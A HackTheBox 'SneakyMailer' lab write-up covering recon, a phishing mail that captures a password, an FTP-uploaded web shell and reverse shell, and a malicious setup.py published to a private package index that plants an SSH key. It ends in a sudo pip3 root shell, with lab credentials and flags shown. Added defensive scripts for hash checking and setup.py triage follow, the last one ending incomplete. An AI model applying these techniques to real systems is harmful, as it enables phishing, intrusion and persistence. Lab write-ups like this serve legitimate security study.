SNEAKYMAILER HACKTHEBOX WRITEUP

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 09:29 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 09:29
    Completed NSE at 09:29, 0.00s elapsed
    Initiating NSE at 09:29
    Completed NSE at 09:29, 0.00s elapsed
    Initiating NSE at 09:29
    Completed NSE at 09:29, 0.00s elapsed
    Initiating Ping Scan at 09:29
    Scanning 10.10.10.197 [4 ports]
    Completed Ping Scan at 09:29, 0.34s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 09:29
    Scanning dev.sneakycorp.htb (10.10.10.197) [1000 ports]
    Discovered open port 25/tcp on 10.10.10.197
    Discovered open port 80/tcp on 10.10.10.197
    Discovered open port 22/tcp on 10.10.10.197
    Discovered open port 21/tcp on 10.10.10.197
    Discovered open port 993/tcp on 10.10.10.197
    Discovered open port 143/tcp on 10.10.10.197
    Discovered open port 8080/tcp on 10.10.10.197
    Completed SYN Stealth Scan at 09:29, 11.04s elapsed (1000 total ports)
    Initiating Service scan at 09:29
    Scanning 7 services on dev.sneakycorp.htb (10.10.10.197)
    Completed Service scan at 09:29, 11.81s elapsed (7 services on 1 host)
    Initiating OS detection (try #1) against dev.sneakycorp.htb (10.10.10.197)
    Retrying OS detection (try #2) against dev.sneakycorp.htb (10.10.10.197)
    Retrying OS detection (try #3) against dev.sneakycorp.htb (10.10.10.197)
    Retrying OS detection (try #4) against dev.sneakycorp.htb (10.10.10.197)
    Retrying OS detection (try #5) against dev.sneakycorp.htb (10.10.10.197)
    Initiating Traceroute at 09:30
    Completed Traceroute at 09:30, 0.32s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 09:30
    Completed Parallel DNS resolution of 2 hosts. at 09:30, 0.57s elapsed
    NSE: Script scanning 10.10.10.197.
    Initiating NSE at 09:30
    Completed NSE at 09:30, 19.73s elapsed
    Initiating NSE at 09:30
    Completed NSE at 09:30, 31.01s elapsed
    Initiating NSE at 09:30
    Completed NSE at 09:30, 0.00s elapsed
    Nmap scan report for dev.sneakycorp.htb (10.10.10.197)
    Host is up (0.66s latency).
    Not shown: 993 closed ports
    PORT     STATE SERVICE  VERSION
    21/tcp   open  ftp      vsftpd 3.0.3
    22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
    |   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
    |_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
    25/tcp   open  smtp     Postfix smtpd
    |_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
    80/tcp   open  http     nginx 1.14.2
    | http-methods: 
    |_  Supported Methods: GET HEAD POST
    |_http-server-header: nginx/1.14.2
    |_http-title: Employee - Dashboard
    143/tcp  open  imap     Courier Imapd (released 2018)
    |_imap-capabilities: completed CAPABILITY IDLE NAMESPACE ACL THREAD=REFERENCES QUOTA CHILDREN UTF8=ACCEPTA0001 IMAP4rev1 ENABLE OK ACL2=UNION STARTTLS THREAD=ORDEREDSUBJECT SORT UIDPLUS
    | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Subject Alternative Name: email:postmaster@example.com
    | Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Public Key type: rsa
    | Public Key bits: 3072
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-05-14T17:14:21
    | Not valid after:  2021-05-14T17:14:21
    | MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
    |_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
    |_ssl-date: TLS randomness does not represent time
    993/tcp  open  ssl/imap Courier Imapd (released 2018)
    | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Subject Alternative Name: email:postmaster@example.com
    | Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
    | Public Key type: rsa
    | Public Key bits: 3072
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-05-14T17:14:21
    | Not valid after:  2021-05-14T17:14:21
    | MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
    |_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
    |_ssl-date: TLS randomness does not represent time
    8080/tcp open  http     nginx 1.14.2
    | http-methods: 
    |_  Supported Methods: GET HEAD
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-server-header: nginx/1.14.2
    |_http-title: Welcome to nginx!
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.80%E=4%D=7/13%OT=21%CT=1%CU=36468%PV=Y%DS=2%DC=T%G=Y%TM=5F0BDC7
    OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS
    OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
    OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
    OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)

    Uptime guess: 7.778 days (since Sun Jul  5 14:50:01 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=259 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 8888/tcp)
    HOP RTT       ADDRESS
    1   322.24 ms 10.10.14.1
    2   322.25 ms dev.sneakycorp.htb (10.10.10.197)

    NSE: Script Post-scanning.
    Initiating NSE at 09:30
    Completed NSE at 09:30, 0.00s elapsed
    Initiating NSE at 09:30
    Completed NSE at 09:30, 0.00s elapsed
    Initiating NSE at 09:30
    Completed NSE at 09:30, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 108.42 seconds
            Raw packets sent: 1619 (75.262KB) | Rcvd: 1163 (50.101KB)

ENUMERATION

Here we have a page full of employee email addresses, so we make a wordlist from them with CeWL and store it in a txt file.

EMAIL WORDLIST :

    airisatou@sneakymailer.htb
    angelicaramos@sneakymailer.htb
    ashtoncox@sneakymailer.htb
    bradleygreer@sneakymailer.htb
    brendenwagner@sneakymailer.htb
    briellewilliamson@sneakymailer.htb
    brunonash@sneakymailer.htb
    caesarvance@sneakymailer.htb
    carastevens@sneakymailer.htb
    cedrickelly@sneakymailer.htb
    chardemarshall@sneakymailer.htb
    colleenhurst@sneakymailer.htb
    dairios@sneakymailer.htb
    donnasnider@sneakymailer.htb
    doriswilder@sneakymailer.htb
    finncamacho@sneakymailer.htb
    fionagreen@sneakymailer.htb
    garrettwinters@sneakymailer.htb
    gavincortez@sneakymailer.htb
    gavinjoyce@sneakymailer.htb
    glorialittle@sneakymailer.htb
    haleykennedy@sneakymailer.htb
    hermionebutler@sneakymailer.htb
    herrodchandler@sneakymailer.htb
    hopefuentes@sneakymailer.htb
    howardhatfield@sneakymailer.htb
    jacksonbradshaw@sneakymailer.htb
    jenagaines@sneakymailer.htb
    jenettecaldwell@sneakymailer.htb
    jenniferacosta@sneakymailer.htb
    jenniferchang@sneakymailer.htb
    jonasalexander@sneakymailer.htb
    laelgreer@sneakymailer.htb
    martenamccray@sneakymailer.htb
    michaelsilva@sneakymailer.htb
    michellehouse@sneakymailer.htb
    olivialiang@sneakymailer.htb
    paulbyrd@sneakymailer.htb
    prescottbartlett@sneakymailer.htb
    quinnflynn@sneakymailer.htb
    rhonadavidson@sneakymailer.htb
    sakurayamamoto@sneakymailer.htb
    sergebaldwin@sneakymailer.htb
    shaddecker@sneakymailer.htb
    shouitou@sneakymailer.htb
    sonyafrost@sneakymailer.htb
    sukiburks@sneakymailer.htb
    sulcud@sneakymailer.htb
    tatyanafitzpatrick@sneakymailer.htb
    thorwalton@sneakymailer.htb
    tigernixon@sneakymailer.htb
    timothymooney@sneakymailer.htb
    unitybutler@sneakymailer.htb
    vivianharrell@sneakymailer.htb
    yuriberry@sneakymailer.htb
    zenaidafrank@sneakymailer.htb
    zoritaserrano@sneakymailer.htb

For reference you can watch IppSec's Chaos video. We need to find which of these addresses are valid, so we send a mail from an unknown sender to each of them one by one; after a while one of them responds, which gives us a valid email address together with its password, like this:

SENDING MAIL :

    ┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #telnet 10.10.10.197 25
    Trying 10.10.10.197...
    Connected to 10.10.10.197.
    Escape character is '^]'.
    220 debian ESMTP Postfix (Debian/GNU)
    MAIL FROM: liquid@sna
    501 5.1.7 Bad sender address syntax
    MAIL FROM: liquid@sneakymailer.htb
    250 2.1.0 Ok
    MAIL TO: paulbyrd@sneakymailer.htb
    503 5.5.1 Error: nested MAIL command
    RCPT TO: paulbyrd@sneakymailer.htb
    250 2.1.5 Ok
    DATA
    354 End data with <CR><LF>.<CR><LF>
    http://10.10.15.56/
    .
    250 2.0.0 Ok: queued as 23A9424686

RESPONSE BACK ON PORT 80 :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #nc -lnvp 80
    listening on [any] 80 ...
    connect to [10.10.15.56] from (UNKNOWN) [10.10.10.197] 53704
    POST /%0D HTTP/1.1
    Host: 10.10.15.56
    User-Agent: python-requests/2.23.0
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive
    Content-Length: 185
    Content-Type: application/x-www-form-urlencoded

    firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt^C

paulbyrd@sneakymailer.htb : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

Now we use the Evolution mail client to fetch all the mail in this mailbox over IMAP:

In the mailbox we find another password, this one for the developer username:

developer : m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

For the Evolution part you can check IppSec's Chaos video.

FTP LOGINS :

    ┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #ftp 10.10.10.197
    Connected to 10.10.10.197.
    220 (vsFTPd 3.0.3)
    Name (10.10.10.197:root): developer
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxrwxr-x    8 0        1001         4096 Jun 30 01:15 dev
    226 Directory send OK.
    ftp> cd dev
    250 Directory successfully changed.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxr-xr-x    2 0        0            4096 May 26 19:52 css
    drwxr-xr-x    2 0        0            4096 May 26 19:52 img
    -rwxr-xr-x    1 0        0           13742 Jun 23 09:44 index.php
    drwxr-xr-x    3 0        0            4096 May 26 19:52 js
    drwxr-xr-x    2 0        0            4096 May 26 19:52 pypi
    drwxr-xr-x    4 0        0            4096 May 26 19:52 scss
    -rwxr-xr-x    1 0        0           26523 May 26 20:58 team.php
    drwxr-xr-x    8 0        0            4096 May 26 19:52 vendor
    226 Directory send OK.
    ftp> 

SUBDOMAIN ENUMERATION :

    ┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.sneakycorp.htb" --hc 301 --hw 356 -t 100 10.10.10.197

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************

    Target: http://10.10.10.197/
    Total requests: 207643

    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                               
    ===================================================================

    000000007:   400        7 L      12 W     173 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"     
    000000009:   400        7 L      12 W     173 Ch      "# Suite 300, San Francisco, California, 94105, USA."                 
    000000810:   200        340 L    989 W    13737 Ch    "dev"   

Here we have another web page on the dev subdomain, and it serves the same files we can reach through FTP. So we upload a shell over FTP and trigger it from the website dev.sneakycorp.htb.

UPLOAD SHELL IN DEV DIRECTORY :

    ftp> put register.php 
    local: register.php remote: register.php
    200 PORT command successful. Consider using PASV.
    150 Ok to send data.
    226 Transfer complete.
    5492 bytes sent in 0.01 secs (441.7859 kB/s)
    ftp> 

TRIGGER SHELL FROM WEBSITE :

RESPONSE WHICH YOU WILL GET :

    ┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #nc -lnvp 1234
    listening on [any] 1234 ...
    connect to [10.10.15.56] from (UNKNOWN) [10.10.10.197] 48488
    Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
    00:41:17 up 4 min,  0 users,  load average: 0.17, 0.21, 0.10
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ 

GETTING USER ACCESS

    $ bash -i
    bash: cannot set terminal process group (685): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@sneakymailer:/$ su developer
    su developer
    Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
    bash: cannot set terminal process group (685): Inappropriate ioctl for device
    bash: no job control in this shell
    developer@sneakymailer:/$ cd
    developer@sneakymailer:~$ id
    uid=1001(developer) gid=1001(developer) groups=1001(developer)
    developer@sneakymailer:~$ cd ../
    developer@sneakymailer:/var/www$ ls
    dev.sneakycorp.htb
    html
    pypi.sneakycorp.htb
    sneakycorp.htb
    developer@sneakymailer:/var/www$ cd pypi.sneakycorp.htb
    cd pypi.sneakycorp.htb
    developer@sneakymailer:/var/www/pypi.sneakycorp.htb$ ls -la
    ls -la
    total 20
    drwxr-xr-x 4 root root     4096 May 15 14:29 .
    drwxr-xr-x 6 root root     4096 May 14 18:25 ..
    -rw-r--r-- 1 root root       43 May 15 14:29 .htpasswd
    drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
    drwxr-xr-x 6 root pypi     4096 May 14 18:25 venv
    developer@sneakymailer:/var/www/pypi.sneakycorp.htb$ cat .htpasswd
    cat .htpasswd
    pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Here we found another domain, pypi.sneakycorp.htb, which we add to /etc/hosts, and an .htpasswd hash which we crack on our own machine.
After cracking we get this:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/sneakymailer]
    └──╼ #hashcat -m 1600 -a 0 pypihash ../../THM/Wordlists/rockyou.txt  --force
    hashcat (v5.1.0) starting...

    OpenCL Platform #1: The pocl project
    ====================================
    * Device #1: pthread-Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz, 2048/5898 MB allocatable, 8MCU

    $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui
                                                    
    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
    Hash.Target......: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
    Time.Started.....: Mon Jul 13 10:17:57 2020 (3 mins, 10 secs)
    Time.Estimated...: Mon Jul 13 10:21:07 2020 (0 secs)
    Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:    19026 H/s (9.30ms) @ Accel:256 Loops:125 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 3614720/14344384 (25.20%)
    Rejected.........: 0/3614720 (0.00%)
    Restore.Point....: 3612672/14344384 (25.19%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
    Candidates.#1....: soulmeets1 -> sotoares

    Started: Mon Jul 13 10:17:32 2020
    Stopped: Mon Jul 13 10:21:08 2020
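As an added example (not from the write-up), the script below re-implements the $apr1$ scheme that hashcat mode 1600 cracked above, so the recovered password can be verified against the .htpasswd line offline. It also shows why the hash fell in three minutes on a laptop CPU: the whole scheme is a fixed 1000 rounds of MD5 and nothing else. The only inputs taken from the page are the hash and the password; the function names are my own.

```python
"""Verify an Apache .htpasswd $apr1$ entry (hashcat mode 1600) in pure Python.

Added example, not part of the write-up: a hashlib re-implementation of the
MD5-based apr1 scheme so the credential recovered above can be checked
offline. The only page-specific inputs are the .htpasswd line and password.
"""
import hashlib
import hmac

_MAGIC = b"$apr1$"
_ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    """apr1's own base64 variant: 'count' characters, low 6 bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_crypt(password: bytes, salt: bytes) -> str:
    """Return '$apr1$<salt>$<hash>' exactly as 'htpasswd -m' writes it."""
    salt = salt[:8]
    ctx = hashlib.md5(password + _MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Feed the alternate digest in, one byte per byte of password length.
    plen = len(password)
    while plen > 0:
        ctx.update(alt[:min(16, plen)])
        plen -= 16
    # Bit ladder over the password length: a NUL or the first password byte.
    i = len(password)
    while i:
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 fixed MD5 rounds are the whole "stretching": cheap for a GPU or
    # even the laptop CPU in the hashcat run above.
    for r in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(password if r & 1 else final)
        if r % 3:
            ctx1.update(salt)
        if r % 7:
            ctx1.update(password)
        ctx1.update(final if r & 1 else password)
        final = ctx1.digest()
    # Digest bytes are interleaved before encoding, inherited from md5crypt.
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups
    ) + _to64(final[11], 2)
    return (_MAGIC + salt + b"$" + encoded).decode()


def verify_htpasswd(entry: str, password: str) -> bool:
    """Check one 'user:$apr1$salt$hash' line against a candidate password."""
    _, hashed = entry.split(":", 1)
    if not hashed.startswith("$apr1$"):
        raise ValueError("not an apr1 entry")
    salt = hashed.split("$")[2]
    computed = apr1_crypt(password.encode(), salt.encode())
    return hmac.compare_digest(computed, hashed)


# The .htpasswd line read from the box and the password hashcat recovered.
HTPASSWD_LINE = "pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/"
CRACKED_PASSWORD = "soufianeelhaoui"

if __name__ == "__main__":
    print(verify_htpasswd(HTPASSWD_LINE, CRACKED_PASSWORD))
```

For files you own, `htpasswd -B` writes bcrypt entries instead, which cost far more per guess than this MD5 construction.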

Also, our pypi.sneakycorp.htb looks like this:

From this we can conclude that we are able to upload packages to this index. So we will build a package manually, so that our own script runs in place of a real package's setup script.

REFERENCES :

https://pypi.org/project/pypiserver/#upload-with-setuptools

https://www.activestate.com/resources/quick-reads/how-to-manually-install-python-packages/#:~:text=Installing%20Python%20Packages%20with%20Setup,Enter%3A%20python%20setup.py%20install

After changing a few minor parts of the sample setup script, it looks like this:

SETUP.PY :


    import setuptools

    # This block runs at import time, i.e. as soon as pip (or the index server)
    # executes setup.py, and appends our public key to low's authorized_keys.
    try:
        with open("/home/low/.ssh/authorized_keys", "a") as f:  # closed by the with block
            f.write("\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChNgxk5jtpjV+hYI+KmW503AaJHeNk11nN14+YNuJ18yXmZn2sqME2DWirrHLpEyYvPeROs0tPBK+K3ZqL8SHierZZHY2FmLIlfAcDzN/mOjZzA3+cXX6iGgOo67nlhaiyisxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxJYw+svdLWT4ihbb/LWCeF+Kjam8bXgb8= root@liquid")
    except Exception:
        pass  # stay silent so the build still succeeds if the path is not writable

    setuptools.setup(
        name="example-pkg3",  # Replace with your own package name
        version="0.0.1",
        author="Example Author",
        author_email="author@example.com",
        description="A small example package",
        long_description="",
        long_description_content_type="text/markdown",
        url="https://github.com/pypa/sampleproject",
        packages=setuptools.find_packages(),
        classifiers=[
            "Programming Language :: Python :: 3",
            "License :: OSI Approved :: MIT License",
            "Operating System :: OS Independent",
        ],
    )

PYPIRC :

    [distutils]
    index-servers = local

    [local]
    repository: http://pypi.sneakycorp.htb:8080
    username: pypi
    password: soufianeelhaoui

Just upload both files into any folder under /tmp on the box and run this command:

    python3 setup.py sdist register -r local upload -r local

    developer@sneakymailer:/$ cd /tmp
    cd /tmp
    developer@sneakymailer:/tmp$ ls
    ls
    systemd-private-2c8ab75d46924481ac84f56b75c9a067-systemd-timesyncd.service-a5Ynvb
    vmware-root_458-834774610
    developer@sneakymailer:/tmp$ mkdir liquid
    mkdir liquid
    developer@sneakymailer:/tmp$ cd liquid
    cd liquid
    developer@sneakymailer:/tmp/liquid$ HOME=$(pwd)
    HOME=$(pwd)
    developer@sneakymailer:~$ pwd
    pwd
    /tmp/liquid
    developer@sneakymailer:~$ wget http://10.10.15.56/setup.py
    wget http://10.10.15.56/setup.py
    --2020-07-13 01:06:52--  http://10.10.15.56/setup.py
    Connecting to 10.10.15.56:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1193 (1.2K) [text/plain]
    Saving to: ‘setup.py’

        0K .                                                     100% 1.94M=0.001s

    2020-07-13 01:06:53 (1.94 MB/s) - ‘setup.py’ saved [1193/1193]

    developer@sneakymailer:~$ wget http://10.10.15.56/.pypirc
    wget http://10.10.15.56/.pypirc
    --2020-07-13 01:07:05--  http://10.10.15.56/.pypirc
    Connecting to 10.10.15.56:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 128 [application/octet-stream]
    Saving to: ‘.pypirc’

        0K                                                       100% 19.6M=0s

    2020-07-13 01:07:07 (19.6 MB/s) - ‘.pypirc’ saved [128/128]

    developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
    python3 setup.py sdist register -r local upload -r local
    running sdist
    running egg_info
    creating example_pkg3.egg-info
    writing example_pkg3.egg-info/PKG-INFO
    writing dependency_links to example_pkg3.egg-info/dependency_links.txt
    writing top-level names to example_pkg3.egg-info/top_level.txt
    writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
    reading manifest file 'example_pkg3.egg-info/SOURCES.txt'
    writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
    warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

    running check
    creating example-pkg3-0.0.1
    creating example-pkg3-0.0.1/example_pkg3.egg-info
    copying files to example-pkg3-0.0.1...
    copying setup.py -> example-pkg3-0.0.1
    copying example_pkg3.egg-info/PKG-INFO -> example-pkg3-0.0.1/example_pkg3.egg-info
    copying example_pkg3.egg-info/SOURCES.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
    copying example_pkg3.egg-info/dependency_links.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
    copying example_pkg3.egg-info/top_level.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
    Writing example-pkg3-0.0.1/setup.cfg
    creating dist
    Creating tar archive
    removing 'example-pkg3-0.0.1' (and everything under it)
    running register
    Registering example-pkg3 to http://pypi.sneakycorp.htb:8080
    Server response (200): OK
    WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
    running upload
    Submitting dist/example-pkg3-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
    Server response (200): OK
    WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
    developer@sneakymailer:~$ 

Here we just SSH into the machine as low, using the key we appended to authorized_keys:

    ┌─[root@liquid]─[~/Desktop/HTB/sneakymailer/pip]
    └──╼ #ssh -i id_rsa low@10.10.10.197
    Enter passphrase for key 'id_rsa': 
    Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    No mail.
    Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
    low@sneakymailer:~$ id
    uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
    low@sneakymailer:~$ cat user.txt
    49438ae21c8095ddd5abe9b1608a266c
    low@sneakymailer:~$ 

GETTING ROOT ACCESS

    low@sneakymailer:~$ sudo -l

    sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
    Matching Defaults entries for low on sneakymailer:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User low may run the following commands on sneakymailer:
        (root) NOPASSWD: /usr/bin/pip3
    low@sneakymailer:~$ 
    low@sneakymailer:~$ TF=$(mktemp -d)
    low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
    low@sneakymailer:~$ sudo pip3 install $TF
    sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
    Processing /tmp/tmp.qRgHUXIOL0
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # cd /root
    # cat root.txt
    d6b1290eeecc5a53d4fcf94fa26d00c0
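As an added defender-side check (not code from the write-up), the script below statically inspects a setup.py and flags the pattern used twice on this box: in the package uploaded to pypi.sneakycorp.htb and in the one-liner fed to sudo pip3 above, code placed outside the setup() call runs the moment pip imports the file. The call and path watch-lists are assumptions, the sample inputs are constructed, and the SSH key is a placeholder.

```python
"""Static triage of a setup.py before it is installed or published.
Added example, not code from the write-up: setup.py is ordinary Python that pip
executes in full, so anything outside setup() runs as whoever runs pip."""
import ast

# Assumed watch-lists; extend them for your own environment.
SUSPICIOUS_CALLS = {
    "open", "exec", "eval", "os.system", "os.popen", "os.execl", "os.execv",
    "os.execvp", "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "socket.socket", "urllib.request.urlopen",
}
SENSITIVE_PATHS = (".ssh/", "authorized_keys", "/etc/", ".bashrc", ".profile")


def _callee_name(call):
    """Dotted name of a call target ('os.execl', 'setuptools.setup') or None."""
    parts, node = [], call.func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _is_setup_call(stmt):
    return (isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
            and _callee_name(stmt.value) in {"setup", "setuptools.setup"})


def triage_setup_py(source):
    """Return sorted (lineno, reason) findings; an empty list means nothing flagged."""
    tree = ast.parse(source)
    findings = set()
    # 1. Module-level statements other than imports, definitions, plain
    #    assignments and the setup() call itself run at import time.
    harmless = (ast.Import, ast.ImportFrom, ast.Assign, ast.FunctionDef, ast.ClassDef)
    for stmt in tree.body:
        if isinstance(stmt, harmless) or _is_setup_call(stmt):
            continue
        findings.add((stmt.lineno, f"top-level {type(stmt).__name__} runs at import time"))
    # 2. Anywhere in the file: OS-touching calls and sensitive path literals.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _callee_name(node)
            if name in SUSPICIOUS_CALLS:
                findings.add((node.lineno, f"call to {name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for frag in SENSITIVE_PATHS:
                if frag in node.value:
                    findings.add((node.lineno, f"sensitive path literal {frag!r}"))
    return sorted(findings)


# Constructed sample mirroring the write-up's setup.py (the key is a placeholder).
MALICIOUS_SETUP = '''\
import setuptools
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\\nssh-rsa AAAA...PLACEHOLDER... root@liquid")
except Exception:
    pass
setuptools.setup(name="example-pkg3", version="0.0.1")
'''
# The one-line setup.py from the sudo pip3 step: same pattern, no setup() at all.
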